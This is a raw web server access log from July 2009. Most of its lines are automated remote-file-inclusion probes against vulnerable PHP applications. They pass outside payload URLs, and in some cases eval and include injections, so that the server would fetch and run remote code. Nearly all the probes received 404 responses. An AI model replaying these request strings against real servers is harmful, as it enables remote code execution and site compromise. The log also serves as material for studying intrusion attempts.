72.14.199.85 - - [01/Jul/2009:01:29:44 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
84.51.241.6 - - [01/Jul/2009:01:37:17 +0000] "GET /logs/access_log//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 320
84.51.241.6 - - [01/Jul/2009:01:37:17 +0000] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 309
84.51.241.6 - - [01/Jul/2009:01:37:17 +0000] "GET //include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 304
84.51.241.6 - - [01/Jul/2009:01:37:18 +0000] "GET /logs/access_log//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 320
84.51.241.6 - - [01/Jul/2009:01:37:18 +0000] "GET //include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 304
84.51.241.6 - - [01/Jul/2009:01:37:19 +0000] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 309
84.51.241.6 - - [01/Jul/2009:01:37:55 +0000] "GET //include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 304
84.51.241.6 - - [01/Jul/2009:01:37:55 +0000] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 309
84.51.241.6 - - [01/Jul/2009:01:37:55 +0000] "GET /logs/access_log//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 320
84.51.241.6 - - [01/Jul/2009:01:51:28 +0000] "GET /logs/access_log%20%20//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 322
84.51.241.6 - - [01/Jul/2009:01:51:30 +0000] "GET /logs/access_log%20%20//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 322
84.51.241.6 - - [01/Jul/2009:01:51:42 +0000] "GET /logs/access_log%20%20//include/print_category.php?setup[use_category]=1&dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 322
211.189.39.159 - - [01/Jul/2009:02:11:39 +0000] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 309
211.189.39.159 - - [01/Jul/2009:02:11:39 +0000] "GET /logs/access_log//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 320
211.189.39.159 - - [01/Jul/2009:02:11:39 +0000] "GET //include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 304
87.98.222.18 - - [01/Jul/2009:02:21:07 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 307
87.98.222.18 - - [01/Jul/2009:02:21:07 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320
87.98.222.18 - - [01/Jul/2009:02:21:07 +0000] "GET //skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 302
202.67.153.114 - - [01/Jul/2009:02:25:34 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 307
202.67.153.114 - - [01/Jul/2009:02:25:34 +0000] "GET //skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 302
202.67.153.114 - - [01/Jul/2009:02:25:34 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320
213.174.60.24 - - [01/Jul/2009:02:28:50 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 307
213.174.60.24 - - [01/Jul/2009:02:28:50 +0000] "GET //skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 302
213.174.60.24 - - [01/Jul/2009:02:28:50 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320
72.14.199.85 - - [01/Jul/2009:02:29:56 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
87.98.222.18 - - [01/Jul/2009:02:30:14 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 318
202.67.153.114 - - [01/Jul/2009:02:35:22 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 318
66.11.230.36 - - [01/Jul/2009:02:38:47 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 335
66.11.230.36 - - [01/Jul/2009:02:38:47 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317
66.11.230.36 - - [01/Jul/2009:02:38:47 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322
195.34.78.110 - - [01/Jul/2009:02:43:57 +0000] "GET /logs/access_log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 332
195.34.78.110 - - [01/Jul/2009:02:43:57 +0000] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 321
195.34.78.110 - - [01/Jul/2009:02:43:57 +0000] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 316
195.34.78.110 - - [01/Jul/2009:02:43:58 +0000] "GET /logs/access_log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 332
195.34.78.110 - - [01/Jul/2009:02:43:58 +0000] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 316
195.34.78.110 - - [01/Jul/2009:02:43:58 +0000] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 321
66.11.230.36 - - [01/Jul/2009:02:48:16 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 333
218.146.231.194 - - [01/Jul/2009:02:54:09 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317
218.146.231.194 - - [01/Jul/2009:02:54:09 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322
218.146.231.194 - - [01/Jul/2009:02:54:09 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 335
218.146.231.194 - - [01/Jul/2009:02:55:41 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 333
206.196.125.113 - - [01/Jul/2009:02:59:37 +0000] "GET /atom.xml HTTP/1.1" 200 4103
207.58.144.202 - - [01/Jul/2009:03:00:21 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 321
207.58.144.202 - - [01/Jul/2009:03:00:24 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 326
207.58.144.202 - - [01/Jul/2009:03:00:24 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 337
83.98.209.71 - - [01/Jul/2009:03:00:48 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 337
83.98.209.71 - - [01/Jul/2009:03:00:48 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 326
83.98.209.71 - - [01/Jul/2009:03:00:48 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 321
83.98.209.71 - - [01/Jul/2009:03:00:52 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 337
83.98.209.71 - - [01/Jul/2009:03:00:53 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 321
83.98.209.71 - - [01/Jul/2009:03:00:55 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 326
83.98.209.71 - - [01/Jul/2009:03:09:58 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 326
83.98.209.71 - - [01/Jul/2009:03:09:58 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 321
83.98.209.71 - - [01/Jul/2009:03:09:58 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 337
124.138.156.3 - - [01/Jul/2009:03:11:09 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 333
124.138.156.3 - - [01/Jul/2009:03:11:09 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322
124.138.156.3 - - [01/Jul/2009:03:11:12 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317
124.0.145.1 - - [01/Jul/2009:03:22:04 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 335
124.0.145.1 - - [01/Jul/2009:03:22:04 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317
124.0.145.1 - - [01/Jul/2009:03:22:04 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 322
83.98.209.71 - - [01/Jul/2009:03:22:59 +0000] "GET /logs/access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 337
83.98.209.71 - - [01/Jul/2009:03:23:00 +0000] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 321
83.98.209.71 - - [01/Jul/2009:03:23:01 +0000] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 326
211.189.39.159 - - [01/Jul/2009:03:28:46 +0000] "GET //include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 304
211.189.39.159 - - [01/Jul/2009:03:28:46 +0000] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 309
211.189.39.159 - - [01/Jul/2009:03:28:46 +0000] "GET /logs/access_log//include/print_category.php?setup[use_category]=1&dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 320
72.14.199.85 - - [01/Jul/2009:03:30:06 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
218.146.231.194 - - [01/Jul/2009:03:40:44 +0000] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 306
218.146.231.194 - - [01/Jul/2009:03:40:45 +0000] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 311
218.146.231.194 - - [01/Jul/2009:03:40:45 +0000] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 322
218.146.231.194 - - [01/Jul/2009:03:41:07 +0000] "GET /logs/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 311
218.146.231.194 - - [01/Jul/2009:03:41:07 +0000] "GET /modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 306
218.146.231.194 - - [01/Jul/2009:03:41:07 +0000] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 322
151.1.154.24 - - [01/Jul/2009:03:43:55 +0000] "GET //skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 302
151.1.154.24 - - [01/Jul/2009:03:43:55 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 307
151.1.154.24 - - [01/Jul/2009:03:43:55 +0000] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320
124.0.145.1 - - [01/Jul/2009:03:50:39 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 333
218.146.231.194 - - [01/Jul/2009:03:52:28 +0000] "GET /logs/access_log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 324
218.146.231.194 - - [01/Jul/2009:03:52:38 +0000] "GET /logs/access_log%20%20/modules/My_eGallery/index.php?basepath=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 324
151.1.154.24 - - [01/Jul/2009:03:57:49 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 318
83.149.102.130 - - [01/Jul/2009:04:01:28 +0000] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 308
83.149.102.130 - - [01/Jul/2009:04:01:28 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 321
83.149.102.130 - - [01/Jul/2009:04:02:37 +0000] "GET /logs/access_log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 319
83.149.102.130 - - [01/Jul/2009:04:15:49 +0000] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 308
83.149.102.130 - - [01/Jul/2009:04:15:49 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 321
83.98.209.71 - - [01/Jul/2009:04:19:43 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 288
83.98.209.71 - - [01/Jul/2009:04:19:44 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 306
83.98.209.71 - - [01/Jul/2009:04:19:44 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 293
83.98.209.71 - - [01/Jul/2009:04:19:56 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 293
83.98.209.71 - - [01/Jul/2009:04:19:56 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 306
83.98.209.71 - - [01/Jul/2009:04:19:57 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 288
195.34.78.110 - - [01/Jul/2009:04:23:18 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
195.34.78.110 - - [01/Jul/2009:04:23:18 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
195.34.78.110 - - [01/Jul/2009:04:23:18 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 304
83.98.209.71 - - [01/Jul/2009:04:25:00 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 304
195.34.78.110 - - [01/Jul/2009:04:26:14 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 306
217.125.38.117 - - [01/Jul/2009:04:27:26 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
217.125.38.117 - - [01/Jul/2009:04:27:26 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
217.125.38.117 - - [01/Jul/2009:04:27:28 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 304
72.14.199.85 - - [01/Jul/2009:04:30:15 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
66.179.104.196 - - [01/Jul/2009:04:41:31 +0000] "GET / HTTP/1.1" 200 125
67.69.254.244 - - [01/Jul/2009:04:41:32 +0000] "GET / HTTP/1.1" 200 125
60.29.241.106 - - [01/Jul/2009:04:41:33 +0000] "GET / HTTP/1.0" 304 -
67.69.254.244 - - [01/Jul/2009:04:41:34 +0000] "GET / HTTP/1.1" 200 125
200.254.92.50 - - [01/Jul/2009:04:41:36 +0000] "GET / HTTP/1.1" 200 125
219.255.135.180 - - [01/Jul/2009:04:41:43 +0000] "GET / HTTP/1.0" 304 -
65.24.12.150 - - [01/Jul/2009:04:41:44 +0000] "GET / HTTP/1.1" 200 125
67.69.254.244 - - [01/Jul/2009:04:41:56 +0000] "GET / HTTP/1.1" 200 125
210.51.23.244 - - [01/Jul/2009:04:42:08 +0000] "GET / HTTP/1.0" 200 125
222.49.117.55 - - [01/Jul/2009:04:42:10 +0000] "GET / HTTP/1.0" 200 125
67.69.254.244 - - [01/Jul/2009:04:42:11 +0000] "GET / HTTP/1.1" 200 125
141.48.119.220 - - [01/Jul/2009:04:42:12 +0000] "GET / HTTP/1.0" 200 125
159.213.87.22 - - [01/Jul/2009:04:42:13 +0000] "GET / HTTP/1.1" 200 125
169.143.0.13 - - [01/Jul/2009:04:42:14 +0000] "GET / HTTP/1.1" 200 125
217.160.106.224 - - [01/Jul/2009:04:42:25 +0000] "GET / HTTP/1.1" 200 125
200.65.129.2 - - [01/Jul/2009:04:42:25 +0000] "GET / HTTP/1.1" 200 125
83.16.182.130 - - [01/Jul/2009:04:51:33 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 322
83.16.182.130 - - [01/Jul/2009:04:51:33 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 335
83.16.182.130 - - [01/Jul/2009:04:51:33 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 317
195.34.78.110 - - [01/Jul/2009:04:52:36 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 288
195.34.78.110 - - [01/Jul/2009:04:52:36 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 293
195.34.78.110 - - [01/Jul/2009:04:52:36 +0000] "GET /logs/access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 306
72.15.152.12 - - [01/Jul/2009:04:57:11 +0000] "GET /logs/access_log/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 303
72.15.152.12 - - [01/Jul/2009:04:57:11 +0000] "GET /logs/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 292
72.15.152.12 - - [01/Jul/2009:04:57:11 +0000] "GET /errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 287
74.125.75.17 - - [01/Jul/2009:04:58:01 +0000] "GET /favicon.ico HTTP/1.1" 404 288
64.233.173.2 - - [01/Jul/2009:04:58:01 +0000] "GET / HTTP/1.1" 200 125
124.0.145.1 - - [01/Jul/2009:05:05:35 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 367
124.0.145.1 - - [01/Jul/2009:05:05:35 +0000] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 349
124.0.145.1 - - [01/Jul/2009:05:05:35 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 354
83.16.182.130 - - [01/Jul/2009:05:06:54 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 333
72.15.152.12 - - [01/Jul/2009:05:07:16 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 303
72.15.152.12 - - [01/Jul/2009:05:07:16 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 308
72.15.152.12 - - [01/Jul/2009:05:07:16 +0000] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1? HTTP/1.1" 404 319
80.93.50.112 - - [01/Jul/2009:05:08:30 +0000] "GET /errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 287
80.93.50.112 - - [01/Jul/2009:05:08:30 +0000] "GET /logs/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 292
80.93.50.112 - - [01/Jul/2009:05:08:37 +0000] "GET /errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v5id1.txt? HTTP/1.1" 404 287
80.93.50.112 - - [01/Jul/2009:05:08:38 +0000] "GET /logs/access_log/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v5id1.txt? HTTP/1.1" 404 303
80.93.50.112 - - [01/Jul/2009:05:08:38 +0000] "GET /logs/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v5id1.txt? HTTP/1.1" 404 292
80.93.50.112 - - [01/Jul/2009:05:10:28 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 347
80.93.50.112 - - [01/Jul/2009:05:10:28 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 331
80.93.50.112 - - [01/Jul/2009:05:10:28 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 336
